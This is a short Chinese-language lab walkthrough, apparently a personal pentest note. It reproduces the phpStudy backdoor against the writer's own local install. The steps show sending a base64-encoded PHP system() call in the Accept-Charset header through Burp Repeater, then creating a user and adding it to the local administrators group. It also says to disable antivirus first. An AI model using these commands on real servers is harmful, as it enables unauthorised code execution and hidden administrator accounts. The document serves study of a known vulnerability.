渗透笔记之phpstudy后门的一次复现

渗透笔记之phpstudy后门的一次复现

渗透笔记之phpstudy后门的一次复现_第1张图片
1.把杀毒软件关闭,防止把后门删除。
2.安装好phpstudy和BURP
3.运行phpstudy
渗透笔记之phpstudy后门的一次复现_第2张图片
4.打开cmd–执行命令Ipconfig–查找到无线网ip
渗透笔记之phpstudy后门的一次复现_第3张图片
5.打开自己搭建网站,输入无线ip地址10.2.96.58
渗透笔记之phpstudy后门的一次复现_第4张图片
6.打开BURP抓包
渗透笔记之phpstudy后门的一次复现_第5张图片
7.浏览器设置本机代理(谷歌)
渗透笔记之phpstudy后门的一次复现_第6张图片
渗透笔记之phpstudy后门的一次复现_第7张图片

8.浏览器重新发送请求,抓包
渗透笔记之phpstudy后门的一次复现_第8张图片
9.点击重发器
渗透笔记之phpstudy后门的一次复现_第9张图片
渗透笔记之phpstudy后门的一次复现_第10张图片

10.需要把两个空格删掉
渗透笔记之phpstudy后门的一次复现_第11张图片
11.添加Accept-Charset:system(“whoami”);并对system(“whoami”);进行base64编码
渗透笔记之phpstudy后门的一次复现_第12张图片
渗透笔记之phpstudy后门的一次复现_第13张图片

发送查看结果
渗透笔记之phpstudy后门的一次复现_第14张图片
12.使用命令添加用户(命令:net user 账号 密码 /add)
对system(“net user shenlian 123123 /add”); 进行base64编码
渗透笔记之phpstudy后门的一次复现_第15张图片
13.执行net user命令查看用户
渗透笔记之phpstudy后门的一次复现_第16张图片
渗透笔记之phpstudy后门的一次复现_第17张图片

14.执行 net localgroup administrators 账户名 /add 给予管理员权限
渗透笔记之phpstudy后门的一次复现_第18张图片
渗透笔记之phpstudy后门的一次复现_第19张图片

你可能感兴趣的:(渗透笔记)